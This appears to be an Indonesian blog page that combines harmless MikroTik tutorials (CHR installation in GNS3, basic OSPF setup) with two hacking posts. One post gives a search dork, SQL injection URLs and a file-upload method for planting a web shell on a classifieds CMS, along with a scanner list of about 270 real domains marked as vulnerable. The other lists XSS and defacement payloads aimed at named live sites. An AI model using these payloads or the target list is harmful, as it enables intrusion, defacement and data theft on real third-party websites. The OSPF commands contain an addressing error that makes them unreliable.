Cara Install Mikrotik CHR di Qemu GNS3 Simulator

Cara menggunakan RAW Image Cloud Hosted Router (CHR) Mikrotik di Qemu GNS3 akan kita bahas pada Tutorial Mikrotik Indonesia kali ini. O ya, Tutorial Mikrotik ini adalah kelanjutan dari artikel sebelumnya tentang :

Mikrotik Simulator Gratis menggunakkan GNS3 dan Cloud Hosted Router (CHR)

Jika Anda belum tau apa itu Mikrotik Cloud Hosted Router (CHR) silakan baca artikel tersebut.

Oke, langsung saja kita mulai Tutorial Mikrotik Cloud Hosted Router (CHR) di Qemu GNS3 Simulator :

1. Download dan Install GNS3 terbaru. Saya anggap Anda sudah menginstall GNS3 nya. Jika belum silakan Download disini.

2. Download file RAW Image Mikrotik CHR untuk Qemu disini.

3. Jika sudah, Buka GNS3 nya. Masuk ke Edit --> Preferences --> Qemu VMs --> Klik New

4. Pada pilihan Qemu Type pilih Default --> Next

5. Beri Nama Virtual Machine nya, misalnya : Mikrotik CHR Qemu --> Next

 

6. Pada pilihan Qemu Binary, pilih versi Qemu yang paling baru --> Pilih file qemu-system-x86_64w.exe --> Isikan alokasi RAM misalnya 64 MB (Jangan terlalu besar 64 MB sudah cukup) --> Next.

7. Pada Pilihan Disk Image (hda) pilih lokasi (folder) anda menyimpan fil RAW image Qemu yang sudah di download sebelumnya --> Akan ada pertanyaan untuk meng-copy file image nya ke folder image Qemu --> pilih saja Yes --> Finish

8. Masih di jendela yang sama --> klik Edit --> Masuk ke tab Network --> Isikan jumlah Adapter yang Anda inginkan, misalnya 5 --> Sehingga jumlah port LAN (interface) nya juga 5 --> OK

9. Kita juga bisa merubah gambar Icon dari Mikrotik CHR nya --> Klik Kanan --> Change symbol --> Pilih gambar icon yang anda inginkan --> OK.

10. Sekarang bisa kita coba masukkan VM CHR Mikrotik nya ke lembar kerja.

 

11. Jalankan VM CHR nya. Proses booting VM CHR nya lumayan lama, silakan tunggu yang sabar ya.

12. Kemudian coba remote Mikrotik CHR nya via console. 

NOTE: Jika VM CHR belum selesai booting, di line console tidak akan muncul apapun, so Tunggu sampai VM nya selesai booting.

13. Jika VM CHR sudah selesai booting, maka di line console akan muncul text untuk login. Silakan login dengan 

Username : admin

Password : (kosong)

14. Ta daa... Mikrotik CHR sudah bisa kita gunakan secara GRATIS dan LEGAL tanpa perlu CRACK :D

Oke, Demikianlah Tutorial Cara menggunakan RAW Image Cloud Hosted Router (CHR) Mikrotik di Qemu GNS3 Simulator. Untuk pengembangan selanjutnya silankan Anda Explore sendiri ya.

Untuk memudahkan Anda dalam mengkonfigurasi Mikrotik CHR nya, Anda bisa remote Mikrotik CHR via Winbox dan koneksikan ke Internet. Caranya sama seperti disini :

Cara Mengkoneksikan Mikrotik GNS3 ke Winbox dan Internet

Read more

Mikrotik Simulator Gratis menggunakkan GNS3 dan Cloud Hosted Router (CHR)

Mikrotik Cloud Hosted Router (CHR) adalah Virtual Machine image dari Mikrotik Router OS yang mempunyai fitur yang sama dengan Mikrotik x86 yang dapat kita install di beberapa Virtual Machine seperti VirtualBox atau VMWare.

Keunggulan Mikrotik Cloud Hosted Router (CHR)

Keunggulan Mikrotik CHR adalah kita dapat menggunakan semua fitur Router OS pada Virtual Machine secara GRATIS tanpa perlu adanya level LICENSE.

Memang dapat kita akui untuk bisa menggunakan Mikrotik untuk simulasi di Virtual Machine cukup sulit. Karena sebelum ada CHR kita pasti gunakan RouterOS x86 yang hanya punya lisensi level 0 yang berarti hanya bisa kita coba secara trial selama 24 jam. Kalaupun tidak puas, biasanya kita cari yang versi yang sudah di CRACK :P. 

Nah, dengan adanya Mikrotik CHR ini kita tidak perlu lagi menggunakan versi trial ataupun nyari yang versi Crack. Kita tinggal gunakan image dari Mikrotik CHR ini saja untuk menggantikan simulasi VM yang kita gunakan sebelumnya. Apalagi Mikrotik CHR ini sangat mudah diintegrasikan dengan Simulator GNS3.

Kekurangan Mikrotik Cloud Hosted Router (CHR)

Layaknya barang GRATISAN lainnya, Mikrotik CHR juga punya kekurangan, yakni bandwidth tiap interface dibatasi hanya 1 Mbit saja. Namun hal tersebut sebenarnya tidak begitu merugikan, menginngat kita hanya gunakan CHR untuk simulasi saja yang tidak membutuhkan terlalu banyak menggunakan bandwidth.

Download Mikrotik CHR

Silakan Download file Image Mikrotik CHR nya disini :
1. Mikrotik CHR v 6.34.img (RAW Image untuk Qemu)
2. Mikrotik CHR v 6.34.vmdk (Image untuk VMWare dan Virtual Box)

Menjalankan Mikrotik CHR pada Virtual Machine

Mikrotik CHR dapat dijalankan pada beberapa Virtual Machine, yaitu Virtual Box, VM Ware, Qemu, dll. Namun, untuk dapat digunakan pada Simulator GNS3, kita gunakan Qemu dan Virtual Box saja.
Cara dan langkah-langkah Instalasi dan menjalankan Mikrotik CHR di Qemu dan VirtualBox serta integrasi nya pada Simulator GNS3, silakan baca di artikel selanjutnya berikut ini :

1. Cara Install Mikrotik CHR di Qemu dan integrasinya ke Simulator GNS3

2. Cara Install Mikrotik CHR di VirtualBox dan integrasinya ke Simulator GNS3

Read more

Download Presentasi Mikrotik User Meeting (MUM) 2015 Yogyakarta

Mikrotik User Meeting (MUM) Indonesia Tahun 2015 ini kembali memecahkan rekor MUM dengan peserta terbanyak di dunia sepanjang sejarah perhelatan MUM. Mikrotik User Meeting yang kembali diselenggarakan di Royal Ambarrukmo Yogyakarta pada 9 - 10 Oktober 2015 ini dihadiri oleh lebih dari 2500 peserta.

Selain rekor jumlah peserta, di MUM kali ini juga terlihat berbeda dan istimewa karena banyak sekali pembicara dan pemateri yang sharing ilmu-ilmu baru dan yang luarbiasanya lagi ada beberapa pemateri yang berasal dari dunia pendidikan. 

Mulai dari guru SMK, hingga siswa SMK nya pun ikut unjuk gigi memberikan materi yang sangat bagus. Baru kali ini ada siswa SMK yang ikut menjadi pemateri di MUM Indonesia. Sungguh luar biasa, materi yang mereka bawakan juga sangat bagus.

Kami sangat mengharapkan bisa mendownload materi presentasi yang mereka bawakan. Namun hingga artikel ini dimuat, link download resmi dari Mikrotik belum juga dirilis. Mungkin dalam beberapa minggu lagi akan dirilis. Kami akan tampil kan update nya disini. 

Namun jangan kecewa dulu, karena ada beberapa file materi presentasi dari para expert mikrotik di Mikrotik.co.id sudah tersedia untuk di Download.

Berikut adalah beberapa link Download Materi Presentasi Mikrotik User Meeting Indonesia 2015 - Yogyakarta :

• SDN Implementation Test on Mikrotik - By: Novan Chris
• FastPath & FasTrack Performance - By: Pujo Dewobroto
• Implementasi Praktis Mikrotik - By: Adyatma Yoga

Sumber Foto :
http://mum.mikrotik.com/gallery/main.php?g2_itemId=18489

Read more

Konfigurasi Dasar OSPF di Mikrotik

Tutorial Mikrotik kali ini akan membahas tentang OSPF dan konfigurasi dasarnya di Mikrotik, oh ya teman-teman pasti sudah tau kan apa itu OSPF? saya percaya kok namun disini mari kita mengulangnya lagi agar tidak lupa, langsung saja cikibrutt.

Pengertian OSPF

OSPF atau kepanjangan dari Open Shortes Path First adalah protocol routing otomatis yang digunakan dalam jaringan LAN (Local Area Network) maupun WAN (Wide Area Network). Routing ini digunakan untuk topology yang mempunyai banyak router, kebayang gak kalau dalam suatu ISP yang mempunyai banyak client yang menggunakan mikrotik sebagai STA, dia harus menyetting ip route satu persatu, OMG apa lagi kalau se-yang lebih besar lagi, gak kebayang ribetnya. 

Oh iya OSPF ini termasuk kategori Link-sate routing protocol, Link state routing protocol ini menggunakan kecepatan jaringan berdasarkan metric untuk menetapkan path-path ke jaringan lainnya. Setiap router merawat map sederhana dari keseluruhan jaringan. Update-update dilakukan via multicast, dan dikirim. Jika terjadi perubahan konfigurasi. OSPF cocok untuk jaringan berskala besar.

Baca lebih lanjut tentang ospf disini atau disini

Maksud dan Tujuan

Ok sekarang maksud dan tujuan, maksud dan tujuan Ospf ini Kita dapat melakukan routing secara otomatis, dua router maupun lebih.

Bahan yang disiapkan

Berikut adalah Tutorial Konfigurasi Dasar OSPF di Mikrotik, dalam tutorial ini karena saya tidak mempunyai router sebanyak itu maka saya menggunakan GNS3

• 4 buah Mikrotik yang sudah terinstall (menggunakan VirtualBox)
• dan 3 Vpcs

Jika anda belum mengetahuinya bisa pelajari disini

Konfigurasi Dasar OSPF di Mikrotik

Berikut adalah Topologi yang saya gunakan

pada topologi diatas sudah terdapat keterangan ip dan interfacenya, sekarang mari kita mulai mengkonfigurasinya
R= ether1=192.168.1.1/24
      ether2=192.168.2.1/24
      ether3=192.168.3.1/24
R2= ether1=192.168.1.2/24
        ether3=192.168.13.1/24 
R3= ether1=192.168.2.2/24
        ether3=192.168.14.1/24
R4= ether1=192.168.3.2/24
        ether2=192.168.12.1/24

1.mari kita masukkan ip ditiap-tiap router sesuai dengan topology yang sudah ada

R1= Ip address add address=192.168.1.1/24 interface=ether1

       ip address add address=192.168.2.1/24 interface=ether2

       ip address add address=192.168.3.1/24 interface=ether3

R2= ip address add address=192.168.1.2/24 interface=ether1

       ip address add address=192.168.13.1/24 interface=ether3 

R3= ip address add address=192.168.2.2/24 interface=ether1

      ip address add address=192.168.14.1/24 interface=ether3

R4= ip address add address=192.168.1.2/24 interface=ether1

       ip address add address=192.168.12.1/24 interface=ether2

2. Kita masukkan perintah ospf nya, masukkan sesuai ip yang tadi kita masukkan di ip address

R=routing ospf network add network=192.168.1.0/24 area=backbone

 routing ospf network add network=192.168.2.0/24 area=backbone

routing ospf network add network=192.168.3.0/24 area=backbone

R2=routing ospf network add network=192.168.1.0/24 area=backbone

routing ospf network add network=192.168.13.0/24 area=backbone

cek dengan "ip route print" maka akan muncul apabila ADo maka itu Active, DHCP, Ospf 

R3=routing ospf network add network=192.168.2.0/24 area=backbone

routing ospf network add network=192.168.14.0/24 area=backbone

R4= routing ospf network add network=192.168.3.0/24 area=backbone

routing ospf network add network=192.168.12.0/24 area=backbone

3. Kita cek tiap-tiap router dengan mengeping router lain, contoh seperti gambar dibawah

Terimakasih, selamat mencoba, Thanks for your attention 

Sumber: http://www.modalsemangat.com/2015/06/contoh-cara-setting-ospf-di-mikrotik.html

Read more

hack CMS IKLAN BARIS

Assalamu’alaikum wr.wb..

Alhamdulillah bisa aktif lagy di underground hehehe..

Kali ini kk minato ingin mengajak kawan” berpesta sedikit :v .. yuk kita langung aja..

##############SQL CMS IKLAN BARIS#####################

# Dork :: inurl:“kategori.php?premium=” atau di kembangin lagy aja.. ;)

Vulnerable found at kategori.php

$id                          = $_GET['id'];

$id_kategori       = $_GET['kategori'];

$qryISI_kat         = select_db("kategori_iklan","*","id_kategori = '$id_kategori'");

$recISI_kat         = fetch_array($qryISI_kat);

$id_iklan_premium         = $_GET['premium'];

$id_iklan_gratis                                = $_GET['gratis'];

$qryISI_premium             = select_db("iklan_premium","*","id_iklan_premium = '$id_iklan_premium'");

$recISI_premium             = fetch_array($qryISI_premium);

$qryISI_gratis    = select_db("iklan_gratis","*","id_iklan_gratis = '$id_iklan_gratis'");

$recISI_gratis     = fetch_array($qryISI_gratis);

Terlihat tdk ada filter disana.. XD

Demo:

http://iklanbitcoin.com/kategori.php?kategori=3’

http://iklanbitcoin.com/kategori.php?kategori=3’+--+

http://iklanbitcoin.com/kategori.php?kategori=3’union+select+1,2,3+--+

vuln column di title,

 http://iklanbitcoin.com/kategori.php?kategori=3'and 0 union select 1,2,concat(0x3c2f7469746c653e3c613e,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)))-- -

#########arbitrary file upload CMS IKLAN BARIS ###################

File //iklan_gratis.php

                $img = $_FILES['gambar']['type'];

                                $imgtype = strtolower($img);

                                                /* if (($imgtype != "image/jpeg")&&($imgtype != "image/bmp")&&($imgtype != "image/gif")&&($imgtype != "image/x-png")){

                                                                alert('File gambar tidak dikenali!!!');

                                                } */

NB::Filternya dibuang sama programmernya XD

Demo::

http://iklanbitcoin.com/iklan_gratis.php

Pasang iklan gratis.. isi box terserah..

Lalu upload file dengan extensi,… shell.php.xxxjpg

Shell lokasi di http://iklanbitcoin.com/images/iklan_baris/shell.php.xxxjpg

Dibawah adalah target yg aku dapatin dr auto scanner ku.. selamat menikmati..lets rock (kita goyang) cms indoesia XD

1. bolamansion.com [NOT_FOUND]

2. afatogel.asia [NOT_FOUND]

3. afapoker.biz [NOT_FOUND]

4. 

5. iklanbet.com [ketemu]

6. iklangroups.com [ketemu]

7. iklansexy.com [NOT_FOUND]

8. iklanpoker.com [ketemu]

9. iklanmurah.net [ketemu]

10. iklan365.com [ketemu]

11. iklanforex.net [ketemu]

12. iklanbitcoin.com [ketemu]

13. iklanword.com [ketemu]

14. iklanbet.com [ketemu]

15. iklangroups.com [ketemu]

16. iklansexy.com [NOT_FOUND]

17. iklanpoker.com [ketemu]

18. iklanmurah.net [ketemu]

19. iklan365.com [ketemu]

20. iklanforex.net [ketemu]

21. iklanbitcoin.com [ketemu]

22. iklanword.com [ketemu]

23. iklanbet.com [ketemu]

24. iklangroups.com [ketemu]

25. iklansexy.com [NOT_FOUND]

26. iklanpoker.com [ketemu]

27. klanmurah.net [NOT_FOUND]

28. iklan365.com [ketemu]

29. iklanforex.net [ketemu]

30. iklanbitcoin.com [ketemu]

31. iklanword.com [ketemu]

32. megaiklan.com [ketemu]

33. mejatangkas.com [ketemu]

34. mentaripoker.us [NOT_FOUND]

35. nagaunik.com [NOT_FOUND]

36. permataiklan.com [ketemu]

37. pokernaga.us [NOT_FOUND]

38. poker228.in [NOT_FOUND]

39. pokerv.net [NOT_FOUND]

40. poker228.info [NOT_FOUND]

41. poker228.asia [NOT_FOUND]

42. poker88plus.com [ketemu]

43. poker88.in [NOT_FOUND]

44. pokerwoles.biz [NOT_FOUND]

45. pokerol.net [NOT_FOUND]

46. samkokbet.info [NOT_FOUND]

47. samkokbet.net [NOT_FOUND]

48. speediklan.com [ketemu]

49. visaiklan.com [ketemu]

50. gamespools.asia [NOT_FOUND]

51. bagusiklan.com [ketemu]

52. serviceiklan.com [NOT_FOUND]

53. pusatpoker.com [NOT_FOUND]

54. mesiniklan.com [ketemu]

55. kucingbirahi.com [NOT_FOUND]

56. karyaiklan.com [ketemu]

57. infotangkas.com [ketemu]

58. iklanbet.com [ketemu]

59. iklangroups.com [ketemu]

60. iklansexy.com [NOT_FOUND]

61. iklanpoker.com [ketemu]

62. iklanmurah.net [ketemu]

63. iklan365.com [ketemu]

64. iklanforex.net [ketemu]

65. iklanbitcoin.com [ketemu]

66. iklanword.com [ketemu]

67. iklanbet.com [ketemu]

68. iklangroups.com [ketemu]

69. iklansexy.com [NOT_FOUND]

70. iklanpoker.com [ketemu]

71. iklanmurah.net [ketemu]

72. iklan365.com [ketemu]

73. iklanforex.net [ketemu]

74. iklanbitcoin.com [ketemu]

75. iklanword.com [ketemu]

76. iklanbet.com [ketemu]

77. iklangroups.com [ketemu]

78. iklansexy.com [NOT_FOUND]

79. iklanpoker.com [ketemu]

80. iklanmurah.net [ketemu]

81. iklan365.com [ketemu]

82. iklanforex.net [ketemu]

83. iklanbitcoin.com [ketemu]

84. iklanword.com [ketemu]

85. iklanbet.com [ketemu]

86. iklangroups.com [ketemu]

87. iklansexy.com [NOT_FOUND]

88. iklanpoker.com [ketemu]

89. iklanmurah.net [ketemu]

90. iklan365.com [ketemu]

91. iklanforex.net [ketemu]

92. iklanbitcoin.com [ketemu]

93. iklanword.com [ketemu]

94. grandiklan.com [ketemu]

95. gejora.com [ketemu]

96. dewarezeki.com [NOT_FOUND]

97. dewamabuk.net [NOT_FOUND]

98. bursajual.com [NOT_FOUND]

99. rimbapoker.us [NOT_FOUND]

100. rgopoker.us [NOT_FOUND]

101. seoiklan.com [ketemu]

102. mejajudi.com [NOT_FOUND]

103. fujiforex.com [ketemu]

104. bejopoker.info [NOT_FOUND]

105. bejopoker.us [NOT_FOUND]

106. bejopoker.info [NOT_FOUND]

107. bejopoker.us [NOT_FOUND]

108. daunpoker.us [ketemu]

109. dewacasino.in [ketemu]

110. dewacasino.asia [NOT_FOUND]

111. dominobet.cc [NOT_FOUND]

112. dominobet.us [NOT_FOUND]

113. dominobet.me [NOT_FOUND]

114. jasapoker.asia [NOT_FOUND]

115. jasapoker.us [ketemu]

116. juaraqq.us [ketemu]

117. juarapoker.us [NOT_FOUND]

118. indoqq.us [NOT_FOUND]

119. juaraqq.us [ketemu]

120. juarapoker.us [NOT_FOUND]

121. lapak303.asia [NOT_FOUND]

122. loginpoker88.com [NOT_FOUND]

123. nagapoker.biz [NOT_FOUND]

124. nagapoker.asia [NOT_FOUND]

125. nagapoker.biz [NOT_FOUND]

126. nagapoker.asia [NOT_FOUND]

127. pokernaga.us [NOT_FOUND]

128. poker228.in [NOT_FOUND]

129. pokerv.net [NOT_FOUND]

130. poker228.info [NOT_FOUND]

131. poker228.asia [NOT_FOUND]

132. poker88plus.com [ketemu]

133. poker88.in [NOT_FOUND]

134. pokerwoles.biz [NOT_FOUND]

135. pokerol.net [NOT_FOUND]

136. pokernaga.us [NOT_FOUND]

137. poker228.in [NOT_FOUND]

138. pokerv.net [NOT_FOUND]

139. poker228.info [NOT_FOUND]

140. poker228.asia [NOT_FOUND]

141. poker88plus.com [ketemu]

142. poker88.in [NOT_FOUND]

143. pokerwoles.biz [NOT_FOUND]

144. pokerol.net [NOT_FOUND]

145. pokernaga.us [NOT_FOUND]

146. poker228.in [NOT_FOUND]

147. pokerv.net [NOT_FOUND]

148. poker228.info [NOT_FOUND]

149. poker228.asia [NOT_FOUND]

150. poker88plus.com [ketemu]

151. poker88.in [NOT_FOUND]

152. pokerwoles.biz [NOT_FOUND]

153. pokerol.net [NOT_FOUND]

154. pokernaga.us [NOT_FOUND]

155. poker228.in [NOT_FOUND]

156. pokerv.net [NOT_FOUND]

157. poker228.info [NOT_FOUND]

158. poker228.asia [NOT_FOUND]

159. poker88plus.com [ketemu]

160. poker88.in [NOT_FOUND]

161. pokerwoles.biz [NOT_FOUND]

162. pokerol.net [NOT_FOUND]

163. pokernaga.us [NOT_FOUND]

164. poker228.in [NOT_FOUND]

165. pokerv.net [NOT_FOUND]

166. poker228.info [NOT_FOUND]

167. poker228.asia [NOT_FOUND]

168. poker88plus.com [ketemu]

169. poker88.in [NOT_FOUND]

170. pokerwoles.biz [NOT_FOUND]

171. pokerol.net [NOT_FOUND]

172. pokernaga.us [NOT_FOUND]

173. poker228.in [NOT_FOUND]

174. pokerv.net [NOT_FOUND]

175. poker228.info [NOT_FOUND]

176. poker228.asia [NOT_FOUND]

177. poker88plus.com [ketemu]

178. poker88.in [NOT_FOUND]

179. pokerwoles.biz [NOT_FOUND]

180. pokerol.net [NOT_FOUND]

181. rgobet.info [NOT_FOUND]

182. rgobet.net [NOT_FOUND]

183. rgobet.us [NOT_FOUND]

184. rgobet.info [NOT_FOUND]

185. rgobet.net [NOT_FOUND]

186. rgobet.us [NOT_FOUND]

187. rgobet.info [NOT_FOUND]

188. rgobet.net [NOT_FOUND]

189. rgobet.us [NOT_FOUND]

190. rgotogel.us [NOT_FOUND]

191. samkokbet.info [NOT_FOUND]

192. samkokbet.net [NOT_FOUND]

193. sayapoker.us [ketemu]

194. togelplus.info [NOT_FOUND]

195. togelplus.net [NOT_FOUND]

196. totojitu.net [NOT_FOUND]

197. totojitu.us [NOT_FOUND]

198. jasapoker.asia [NOT_FOUND]

199. jasapoker.us [ketemu]

200. beritapoker.com [ketemu]

201. idpools.net [ketemu]

202. arwanapoker.us [ketemu]

203. dewacasino.in [ketemu]

204. dewacasino.asia [NOT_FOUND]

205. dewabitcoin.com [NOT_FOUND]

206. dewabatu.com [NOT_FOUND]

207. juraganiklan.com [ketemu]

208. juraganlink.com [ketemu]

209. juraganiklan.com [ketemu]

210. juraganlink.com [ketemu]

211. dewabitcoin.com [NOT_FOUND]

212. dewabatu.com [NOT_FOUND]

213. iklanbet.com [ketemu]

214. iklangroups.com [ketemu]

215. iklansexy.com [NOT_FOUND]

216. iklanpoker.com [ketemu]

217. iklanmurah.net [ketemu]

218. iklan365.com [ketemu]

219. iklanforex.net [ketemu]

220. iklanbitcoin.com [ketemu]

221. iklanword.com [ketemu]

222. mabukpoker.com [NOT_FOUND]

223. iklanbet.com [ketemu]

224. iklangroups.com [ketemu]

225. iklansexy.com [NOT_FOUND]

226. iklanpoker.com [ketemu]

227. iklanmurah.net [ketemu]

228. iklan365.com [ketemu]

229. iklanforex.net [ketemu]

230. iklanbitcoin.com [ketemu]

231. iklanword.com [ketemu]

232. listingbetting.com [NOT_FOUND]

233. pok3r88.com [NOT_FOUND]

234. bisnisgelap.com [ketemu]

235. pokernaga.us [NOT_FOUND]

236. poker228.in [NOT_FOUND]

237. pokerv.net [NOT_FOUND]

238. poker228.info [NOT_FOUND]

239. poker228.asia [NOT_FOUND]

240. poker88plus.com [ketemu]

241. poker88.in [NOT_FOUND]

242. pokerwoles.biz [NOT_FOUND]

243. pokerol.net [NOT_FOUND]

244. bolatangkasplus.com [ketemu]

245. culturalexpertise.com [ketemu]

246. culturacervejeira.com [ketemu]

247. lucchesigalati.com [ketemu]

248. vangeel-ips.com [ketemu]

249. mojotheater.com [ketemu]

250. gmchealth.com [ketemu]

251. bizimaraba.com [NOT_FOUND]

252. dewasurga.com [ketemu]

253. cushingacademylibrary.com [NOT_FOUND]

254. cushingacademy.net [NOT_FOUND]

255. norcatcard.com [ketemu]

256. sourceurban.com [ketemu]

257. internationalpsychoanalysis.org [NOT_FOUND]

258. dawsonstrategic.com [ketemu]

259. iklanbet.com [ketemu]

260. iklangroups.com [ketemu]

261. iklansexy.com [NOT_FOUND]

262. iklanpoker.com [ketemu]

263. iklanmurah.net [ketemu]

264. iklan365.com [ketemu]

265. iklanforex.net [ketemu]

266. iklanbitcoin.com [ketemu]

267. iklanword.com [ketemu]

268. frederictontweets.com [ketemu]

269. bluebuffalohg.com [ketemu]

270. culturalexpertise.com [ketemu]

271. ulturacervejeira.com [NOT_FOUND]

272. diurnalize.com [ketemu]

273. alexavegas.net [ketemu]

 tunggu update selanjutnya yh... bnyk rahasia yg akan kita kaji ^_^ 

salam dr keluarga  Sec7or

Read more

error.php XSS (Cross Site Scripting) Vulnerabilities 2016

error.php XSS (Cross Site Scripting) Vulnerabilities

Title : error.php XSS 

Risk : Cross site scripting, cookie Grabbing 

Poc : error.php?error=

Dork : "inurl:error.php?error="

Author : Minhal Mehdi (devilscafe.in)

browser : Mozilla Firefox 

error.php XSS (Cross Site Scripting) Vulnerabilities

1). Go to Google and now type the dork "inurl:error.php?error="

in search results ignore all the extra results with different URL Like : error-php-error.php

pick site with url www.site.com/error.php?error= Only..

2). Now Type your first Tag to Check the vulnerability 

example : www.site.com/error.php?error=<h1>Test</h1>

if it will show you "Test" word in Header tag this Its Vulnerable

Here are few ways in you you can inject your xss vector :) ..

How To show Header XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<h1>Hacked</h1>

To show header in center XSS injection:

http://www.sacareerfocus.co.za/error.php?error=<center><h1>Hacked</h1></center>

How to show Title XSS injection:

http://www.sacareerfocus.co.za/error.php?error=<title>Hacked</title>

How to Add a Image XSS injection:

http://www.sacareerfocus.co.za/error.php?error=<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbRsPwyz0WHjVvS9m-EE7xmkasRkwpLH-R-e_wavQ9gNje9ClsH6xNSckw1eGE9U2NGciJG9HzFia4upikWlxx2fD35fLI3chd1XMUe6xaeX_i55frSH-BKQ3tJCw_5f6UE7OHLTPUNiyR/s640/cats.jpg"/>

How to add a Message XSS injection: 

http://www.sacareerfocus.co.za/error.php?error=<p><b>Your Message Here<b></p>

How to write message in next lines XSS injection:

http://www.sacareerfocus.co.za/error.php?error=<p><b>First line<br>Second Line <b></p> 

How To add a scrolling Text XSS injection:

http://www.sacareerfocus.co.za/error.php?error=<marquee>Scrolling text Here</marquee>

How To Add a alert box XSS injection:

http://www.sacareerfocus.co.za/error.php?error=<script>alert("hello");</script>

How To add background colour in page XSS injection:

http://www.sacareerfocus.co.za/error.php?error=<body bgcolor="red"/>

How to Add a full deface Page XSS injection:

http://www.sacareerfocus.co.za/error.php?error=<title>Hacked</title><center><h1>hacked<h1><body bgcolor="red"/><p><b>You have been Hacked<br></b></p><img src="http://t0.gstatic.com/images?q=tbn:ANd9GcTN4uz2ifRTDefV_N7O2ZLEnyNfWb5TooIwqmZSwxOe_XH-8FksHA"/>

<marquee><b>www.thehackerstore.net</b></marquee>

you can add more html and javscript tags here,
here is another demo site : 

www.carrubbers.org/error.php?error=<center><h1>www.thehackerstore.net</h1></center>
find More website with dorks :)

if you have any queries feel free to comment below :)

Read more